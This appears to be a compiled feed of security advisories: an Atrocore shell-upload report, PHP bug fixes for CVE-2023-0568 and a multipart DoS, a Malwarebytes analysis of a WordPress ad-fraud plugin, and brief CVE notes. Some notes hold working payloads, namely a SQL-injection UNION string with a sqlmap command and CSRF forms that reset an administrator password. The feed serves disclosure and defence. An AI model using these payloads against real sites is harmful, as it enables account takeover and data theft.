Atrocore version 1.5.25 suffers from a remote shell upload vulnerability.

    ## Title: atrocore-1.5.25 User interaction - Unauthenticated File upload - RCE## Author: nu11secur1ty## Date: 02.16.2023## Vendor: https://atropim.com/## Software: https://github.com/atrocore/atrocore/releases/tag/1.5.25## Reference: https://portswigger.net/web-security/file-upload## Description:The `Create Import Feed` option with `glyphicon-glyphicon-paperclip`function appears to be vulnerable to User interaction -Unauthenticated File upload - RCE attacks.The attacker can easily upload a malicious then can execute the fileand can get VERY sensitive information about the configuration of thissystem, after this he can perform a very nasty attack.STATUS: HIGH Vulnerability CRITICAL[+]Payload:```PHP<?php  phpinfo();?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/atrocore/atrocore-1.5.25)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://streamable.com/g8998d)## Time spend:00:45:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Atrocore 1.5.25 Shell Upload

In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, core path resolution function allocate buffer one byte too small. When resolving paths with lengths close to system MAXPATHLEN setting, this may lead to the byte after the allocated buffer being overwritten with NUL value, which might lead to unauthorized data access or modification.

Sec Bug #81746

1-byte array overrun in common path resolve code

Submitted:

2023-01-20 22:19 UTC

Modified:

2023-02-13 04:40 UTC

From:

dossche dot niels at gmail dot com

Assigned:

stas (profile)

Status:

Closed

Package:

\*Directory/Filesystem functions

PHP Version:

8.0.27

OS:

Linux

Private report:

No

CVE-ID:

2023-0568

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2023-01-20 22:22 UTC\] dossche dot niels at gmail dot com**

Upon trying to add a patch I get ERROR:    The bug #81746 is not available to public.
So I'll add it here below:


diff --git a/ext/dom/document.c b/ext/dom/document.c
index 4dee5548f1..c60198a3be 100644
--- a/ext/dom/document.c
+++ b/ext/dom/document.c
@@ -1182,7 +1182,7 @@ static xmlDocPtr dom\_document\_parser(zval \*id, int mode, char \*source, size\_t so
 	int validate, recover, resolve\_externals, keep\_blanks, substitute\_ent;
 	int resolved\_path\_len;
 	int old\_error\_reporting = 0;
-	char \*directory=NULL, resolved\_path\[MAXPATHLEN\];
+	char \*directory=NULL, resolved\_path\[MAXPATHLEN + 1\];
 
 	if (id != NULL) {
 		intern = Z\_DOMOBJ\_P(id);
diff --git a/ext/xmlreader/php\_xmlreader.c b/ext/xmlreader/php\_xmlreader.c
index c17884d960..39141c8c12 100644
--- a/ext/xmlreader/php\_xmlreader.c
+++ b/ext/xmlreader/php\_xmlreader.c
@@ -1017,7 +1017,7 @@ PHP\_METHOD(XMLReader, XML)
 	xmlreader\_object \*intern = NULL;
 	char \*source, \*uri = NULL, \*encoding = NULL;
 	int resolved\_path\_len, ret = 0;
-	char \*directory=NULL, resolved\_path\[MAXPATHLEN\];
+	char \*directory=NULL, resolved\_path\[MAXPATHLEN + 1\];
 	xmlParserInputBufferPtr inputbfr;
 	xmlTextReaderPtr reader;
 
diff --git a/main/fopen\_wrappers.c b/main/fopen\_wrappers.c
index f6ce26e104..bb39987e77 100644
--- a/main/fopen\_wrappers.c
+++ b/main/fopen\_wrappers.c
@@ -129,8 +129,8 @@ PHPAPI ZEND\_INI\_MH(OnUpdateBaseDir)
 \*/
 PHPAPI int php\_check\_specific\_open\_basedir(const char \*basedir, const char \*path)
 {
-	char resolved\_name\[MAXPATHLEN\];
-	char resolved\_basedir\[MAXPATHLEN\];
+	char resolved\_name\[MAXPATHLEN + 1\];
+	char resolved\_basedir\[MAXPATHLEN + 1\];
 	char local\_open\_basedir\[MAXPATHLEN\];
 	char path\_tmp\[MAXPATHLEN\];
 	char \*path\_file;

 **\[2023-01-20 22:22 UTC\] dossche dot niels at gmail dot com**

Related To: Bug #81746

 **\[2023-01-23 13:14 UTC\] cmb@php.net**

Thanks for reporting this issue!

> I'm not sure whether this actually qualifies as a security
> issue, because this situation would be very exceptional.

Yeah, but nonetheless a buffer overrun is very bad.

Anyway, this might actually be the root case of GH-9903\[1\] (but
let's not discuss there, because the issue is public).

> Upon trying to add a patch I get ERROR:

Yeah, known issue.  We often share sec patches via as \*secret\*
Gist (<https://gist.github.com/\>).  A better option might be to
file a security advisory\[2\].  This is not publicly announced,
since we're just trying out the feature, but there it should be
possible to provide private forks which may give better code
review options (and maybe could run CI in the future).

\[1\] <https://github.com/php/php-src/issues/9903\>
\[1\] <https://github.com/php/php-src/security/advisories\>

 **\[2023-01-23 18:42 UTC\] dossche dot niels at gmail dot com**

\> Anyway, this might actually be the root case of GH-9903\[1\] (but
> let's not discuss there, because the issue is public).

I didn't see this before.
I just checked this and my patch does not resolve that issue.
The path of 4095 is not allowed because of this check: https://github.com/php/php-src/blob/c40dcf93d0b95d9a1026476b202f5aa965fb3fdd/Zend/zend\_virtual\_cwd.c#L1025
This check is important as it prevents the buffer overrun for the trailing slash, so that code is not vulnerable right now.
To fix that issue we should correct the check, and additionally check if we still have enough space for the trailing slash only if we actually need to add it.

In the patch I posted here, I proposed to grow the arrays by one, but perhaps we can use the same strategy as I described above: just check if we still have enough room to add a trailing slash and otherwise fail somehow.

> We often share sec patches via as \*secret\* Gist (<https://gist.github.com/\>).

Ah, completely forgot that was a thing.


Shall I wait for more feedback to come in, or should try the proposed solution to both this issue and GH-9903?

Thanks in advance

 **\[2023-01-27 08:02 UTC\] stas@php.net**

\> In the patch I posted here, I proposed to grow the arrays by one, but perhaps we can use the same strategy as I described above: just check if we still have enough room to add a trailing slash and otherwise fail somehow.

I think either one would work, probably. So if you have a patch, please add a link to it as secret gist.

 **\[2023-01-29 07:46 UTC\] stas@php.net**

\-CVE-ID: needed +CVE-ID: 2023-0568

 **\[2023-01-30 05:16 UTC\] stas@php.net**

Looks good for open\_basedir, for XML though I am not sure it's legit to send it overly long paths. It may have fixed buffers inside too. I'd rather add a check and have the parsing fail if the path is too long.

 **\[2023-01-30 07:30 UTC\] dossche dot niels at gmail dot com**

Thanks for the review. 
As far as I understand for the XML case, the xmlCanonicPath function actually makes a URI from the path, it even extends the path in some cases: https://gist.github.com/nielsdos/fa19867a89b38b0137b6d91ffcbe749d (I couldn't link to GitLab directly because of the antispam system, so I had to paste the link in a gist)

So that's why I thought it is safe, because URI's aren't constrained to a platform's PATH\_MAX, and otherwise the extending would be unsafe too.
I can change it if you want, but I think that's not strictly necessary.

 **\[2023-02-13 04:40 UTC\] stas@php.net**

\-Status: Open +Status: Closed \-Assigned To: +Assigned To: stas

 **\[2023-02-13 04:40 UTC\] stas@php.net**

The fix for this bug has been committed.
If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test.
Thank you for the report, and for helping us make PHP better.

CVE-2023-0568: 1-byte array overrun in common path resolve code

In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, excessive number of parts in HTTP form upload can cause high resource consumption and excessive number of log entries. This can cause denial of service on the affected server by exhausting CPU resources or disk space.

**Summary**

The request body parsing in PHP allows any unauthenticated attacker to consume  
a large amount of CPU time and trigger excessive logging.

**Details**

The multipart body parser processes an unlimited number of file parts.  
The multipart body parser processes an unlimited number of field parts.  
The multipart body parser emits an unbound number of warning messages.

**Impact**

This is a remote unauthenticated Denial of Service vulnerability.

The default/production configuration is affected by this vulnerability.

The large amount of CPU time required for processing requests can block all  
available worker processes and significantly delay or slow down the processing  
of legitimate user requests.  
The large volume of warning messages can wear down the disk and fill it up.  
Complete DoS is achievable by sending many concurrent multipart requests in a  
loop.

PHP parses the request body before invoking any application scripts.  
This vulnerability affects all PHP websites that accept POST request bodies  
(post_max_size set to a value greater than zero, the default value is 8MB).

As a mitigation, users can decrease post_max_size close to zero. This will  
render most websites non-interactive and/or break file uploads.

CVE-2023-0662: DoS vulnerability when parsing multipart request body

Categories: Threat Intelligence
Tags: ad fraud

Tags:  popunder

Tags:  ads

Tags:  fraud

Tags:  wordpress

Tags:  plugins

Popunders are the ideal vehicle to serve ad fraud. In this case, we investigate a scheme where a webpage you can't see is loading a bunch of ads while code mimics user activity by scrolling and visiting links.



(Read more...)




The post WordPress sites backdoored with ad fraud plugin appeared first on Malwarebytes Labs.

WordPress is an immensely popular content management system (CMS) powering over 43% of all websites. Many webmasters will monetize their sites by running ads and need to draw particular attention to search engine optimization (SEO) techniques to maximize their revenues.

But some people will take a shortcut to gaining traffic by engaging in legal but sometimes fraudulent practices. In this instance, we identified someone buying popunder traffic to promote their websites. A popunder is a very common occurrence online and consists of launching a secondary page under the current one. In itself, it could be considered simply an annoyance and is not malicious except when the website that is being launched uses various techniques to defraud advertisers.

We discovered a few dozen WordPress blogs using the same plugin that mimics human activity by automatically scrolling a page and following links within it, all the while a number of ads were being loaded and refreshed. The blogs would only exhibit this invalid traffic behavior when launched from a specific URL created by this plugin, otherwise they appeared completely legitimate.

In this post, we share the technical details behind this ad fraud scheme and any clues pointing to the developer of this WordPress plugin.

**Key findings**

*   About 50 WordPress blogs have been backdoored with a plugin called fuser-master
*   One of the blogs performing this ad fraud had 3.8 M visits in January, with an average visit duration of 24:55 minutes and 17.50 pages per visit
*   This plugin is being triggered via popunder traffic from a large ad network
*   The WordPress sites are being loaded in a separate page underneath and display a number of ads
*   The plugin contains JavaScript code that mimics the activity of a real visitor: scrolls the page, clicks on links, etc.
*   The code also monitors for real human activity (mouse movement) and will immediately stop the fake scrolling when that happens

_Figure 1: Diagram summarizing ad fraud case_

**Fuser-master WordPress plugin**

Recently we blogged about ad fraud involving a popunder as well, except in that case it was using an iframe to hide the ads. Here, there is nothing hidden at all and the ad fraud can only be deduced when the page is being scrolled down, and back up at random intervals. Because it is a popunder, anyone becomes an unwitting accomplice and does not see any of the fraudulent behavior.

In this investigation, we won't be spending time on the ad network facilitating these popunders but we have a fairly good idea of which one it might be based on anti-debugging code that they used. What makes popunders particularly enticing for ad fraud is the fact they allow content to be loaded and remain until further action. Unlike the main browser window where a user can easily navigate away from the current website they are visiting, the popunder will remain open for several minutes or even hours, until it is closed.

We were able to trigger the popunder several times and noticed that the fraudsters were using several different blogs that all had the same thing in common, namely they used a plugin called 'fuser-master'. There aren't many references for this plugin such as where to download it or who its author might be. We were only able to find one mention from themesinfo.com which is a WordPress theme detector.

_Figure 2: A list of websites using the fuser-master plugin_

Not all the sites listed in the gallery still exist or are fully functional, but that still gave us a good indication of what was being used to turn standard blogs into ad fraud robots. It's worth mentioning again that when visited at their homepage, all these blogs are static in nature, meaning we don't see this kind of zombie activity where the page is scrolling by itself. In the next section, we will look at the URL entry point that triggers that specific behavior.

**User check and redirect**

All of these blogs appear typical when visited directly, so they would likely pass both a manual and human verification. However, when a special URL (the entry point) is entered with the corresponding parameters, they turn into ad fraud. Below you can see the URL path and its parameters that are being used on all the blogs where that plugin has been installed:

**/wp-content/plugins/fuser-master/entrypoint.php?**

*   e
*   Iptoken
*   websiteid
*   geo

First, the current user is checked to determine if they should be allowed to enter into the ad fraud scheme or not:

_Figure 3: Pre-check for cookies_

The fraudsters are using open redirects from Google and Twitter in an interesting way. A keyword from an array corresponding to related Google search terms is picked and added to a Google search URL:

_Figure 4: SEO trick_

That keyword is chosen randomly and makes up the dynamic redirect URL:

_Figure 5: Keyword used in redirect_

The next web request is the actual redirect code which also drops some cookies. The URL and code for the redirect will vary based on the different options set up previously:

_Figure 6: Google open redirect_ 

_Figure 7: Twitter open redirect_

The popunder will effectively load the blog via the entrypoint, then immediately leave it to re-enter via a Google open redirect as if someone had clicked on one of the search results. This is what it looks like:

_Figure 8: Animation showing open redirect mechanism_

**Faking user activity**

As mentioned previously, the blogs will only exhibit their ad fraud nature when visited via the fuser-master plugin's entry point. We know that this happens when a user was browsing the web, clicked on a page and a popunder was launched. The blog will open up in a new window **behind** the current window, which means the user is completely unaware of what is happening.

It becomes quickly obvious that there is something odd when the popunder is exposed. We notice some scrolling back and forth and somewhat randomly which truly mimics what a human would do when reading an article. When looking at the code we can see that it checks for user activity (more on that later) and only performs this scrolling activity if it has not detected real mouse movements on the page:

_Figure 9: Code for automated scrolling_

Had the popunder been the same blog without this fake scrolling there would be no reason to suspect mischief. Of course the fraudsters aren't interested in a static page without any kind of user interaction as their goal is monetization via ads. This invalid traffic needs to look as valid as possible in order to not get flagged by anti ad fraud solutions:

_Figure 10: Animation showing automated scrolling_

Another interesting aspect of this fraud is how at regular intervals, a new article is being viewed. This makes sense in the context of a standard visitor to a blog continuing on the site by following other articles that they might be interested in reading. Looking at the fuser-master's code, we see that it tries to get all internal URLs from the currently loaded page and places these links into an array. If we observe what's happening, see that after a certain number of scrolling up and down, a different article gets loaded and the scrolling resumes. This fake activity could last from minutes to hours, until it is interrupted by the real human who's currently at their computer.

**Freeze game**

At some point, the real user will close their browser or the page that was in front of the popunder. When that happens, all fake activity suddenly stops and the blog becomes static. This is a clever trick to avoid suspicion and reminds us of the 'freeze' game kids play. The fraudsters are able to detect when the mouse is being placed over the current page and can quickly stop the code from running.

_Figure 11: Monitoring for real user activity_

Figure 12: Stopping fake activity after real user is detected

**Same web developer built those blogs**

Looking through the Internet Archive, we identified an Indian web developer behind several of these sites. Some of the older posts were written by him and the layout such as the scroll bar style and test ads are also identical. There is nothing that definitely proves that this web developer created the ad fraud plugin although he had the technical skills to do so and based on his community WordPress identity was involved in a number of posts about various SEO plugins.

_Figure 13: Demo blog using a similar template reused elsewhere_

In addition, his own business website also features those blogs in his portfolio and while hovering over the thumbnails we can't help but notice a scrolling technique very similar to what we saw previously with the ad fraud.

_Figure 14: Portfolio showcasing some of the blogs_

We contacted one of his supposed customers to let them know about the fuser-mater plugin running on their site. While we did not hear back from them, within about an hour the plugin had been removed from their WordPress installation.

_Figure 15: Fuser-master plugin was deleted shortly after our notification_

If the web developer wanted to earn from this ad fraud scheme, he would need to have his own publisher IDs and overwrite the ones used by his customers, however we could not immediately verify that this was the case. It's also possible that the plugin is sold as an "add-on" and that some of his customers are fully aware of it, but we could not prove that either.

Contrary to the previous ad fraud case we looked at, this one does not simply use Google ads. Instead they are going through a number of ad platforms which makes their publisher ID and potential revenue more difficult to figure out. We do know that one of the websites featured in this investigation (momplaybook\[.\]com) had 3.8 million visitors in January, spending an average of 24 minutes and looking at 17 pages on the site (stats by SimilarWeb).

_Figure 16: Malwarebytes Browser Guard_

Visiting that same website, Malwarebytes Browser Guard blocked over a thousand ad trackers after a few minutes of sitting idle on the main page. The majority of requests came from Google's DoubleClick and OpenX which we have informed.

**Conclusion**

While popunders are a legitimate form of advertising, their very format is susceptible to abuse. For ad fraud in particular, popunders allow websites to be loaded and serve ads that will never be viewed by real humans.

The plugin we identified during this investigation is relatively simple and allows anyone with an ordinary WordPress blog to increase their earnings dramatically. Because regular visitors will come to the blog via a different flow (standard search or referral link), none of the fraudulent behaviors will be shown. All that is needed is to purchase ad space via a large popunder distributor and use the special entry point URL that triggers the fuser-master plugin.

We have shared details about this invalid traffic case with other partners in the industry.

**Indicators of Compromise**

momplaybook\[.\]com

geekextreme\[.\]com

femme4\[.\]com

mealplays\[.\]com

dorkfuel\[.\]com

automobilenews\[.\]net

thedailycute\[.\]com

beingexpat\[.\]com

klinkeltown\[.\]com

tidbitsofexperience\[.\]com

lostmeals\[.\]org

bakedoccasions\[.\]com

bakedoccasions\[.\]com

brightsidebeauty\[.\]com

cookbooksandkids\[.\]com

bowlsunset\[.\]com

thereporterz\[.\]com

basicguru\[.\]com

bonafidepress\[.\]com

geeksdigest\[.\]com

hairstylesideashub\[.\]com

techlivewire\[.\]com

thecryptosyndicate\[.\]com

theframeloop\[.\]com

thegamershub\[.\]co\[.\]uk

fastmint\[.\]com

gordigecr\[.\]it

techlivewire\[.\]com

bonafidepress\[.\]com

chaosandkiddos\[.\]com

geekandtech\[.\]com

geeksdigest\[.\]com

rec-canada\[.\]com

madassgamers\[.\]com

cravecanada\[.\]com

travelnicer\[.\]com

geartaxi\[.\]com

berrry\[.\]com

buytechstuff\[.\]com

pagehabit\[.\]com

techcola\[.\]com

techdeed\[.\]com

rebelgamejam\[.\]com

leftrightpolitics\[.\]com

followthatbitcoin\[.\]com

WordPress sites backdoored with ad fraud plugin

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

**Cross-site Scripting in kimai/kimai**

Moderate severity GitHub Reviewed Published Feb 16, 2023 to the GitHub Advisory Database • Updated Feb 16, 2023

GHSA-r58m-v5pr-jhhq: Cross-site Scripting in kimai/kimai

SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.

CVE-2020-21120: SQL Injection Prevention - OWASP Cheat Sheet Series

SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information.

Hi there,

I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.  
In api/user.api.php, the function getUserName directly calls function __checkUserName in controllers/user.ctrl.php file without filtering on variables. Attacker can pass arbitrary string to username variable through $info. This allows injection to the __checkUsername function directly:

getUserName:

    function getUserName($info) {
        
             		$username = $info['username']; 
            		$returnInfo = array();      
            		// validate the user ifd and user info
         		        if (!empty($username)) {      
            			if ($userInfo = $this->ctrler->__checkUserName($username)) {      
            				$returnInfo['response'] = 'success';
       
            				$returnInfo['result'] = $userInfo;
         
            				return $returnInfo;
        
            			}
          
            		}
        
            		$returnInfo['response'] = 'Error';      
            		$returnInfo['error_msg'] = "Invalid username provided";      
            		return  $returnInfo;
            	}
    

\_\_checkUserName:

    	function __checkUserName($username){
             		$sql = "select id from users where username='$username'";  
            		$userInfo = $this->db->select($sql, true);      
            		return empty($userInfo['id']) ? false :  $userInfo['id'];      
            	}
    

The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:

    POST /seopanel/api/api.php HTTP/1.1
    Host: localhost
    Accept: */*
    Content-Length: 118
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin
    

with sqlmap command: sqlmap -r injection.txt -p 'username'. A boolean-based blind injection shall work, with payload similar to:  
username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')--  (do note that there's one space at the end of variable to bypass the original quotation mark).

CVE-2021-34117: SQL Injection Vulnerability in API function (user.api.php) · Issue #219 · seopanel/Seo-Panel

Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.

**Vulnerability description**

A csrf vulnerability was discovered in baijiacmsV4.  
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.  
1.modify the store information.  
poc：

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
          <input type="hidden" name="id" value="2" />
          <input type="hidden" name="sname" value="xxx" />
          <input type="hidden" name="website" value="xxx" />
          <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
          <input type="hidden" name="status" value="1&apos;" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Original store information  
  
When a logged in administrator opens a malicious web page and clicks the button  
  
And the store information has changed  

2.modify login password.  
poc:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="newpassword" value="111111" />
          <input type="hidden" name="confirmpassword" value="111111" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

When a logged in administrator opens a malicious web page and clicks the button.  
  
And the login password of the administrator will be 111111.

CVE-2021-33396: There is a CSRF vulnerability · Issue #7 · baijiacms/baijiacmsV4

SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-33925: There is a sql injection vulnerability · Issue #1 · nitinparashar30/cms-corephp

SQL Injection vulnerability in Kliqqi-CMS 2.0.2 in admin/admin_update_module_widgets.php in recordIDValue parameter, allows attackers to gain escalated privileges and execute arbitrary code.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#php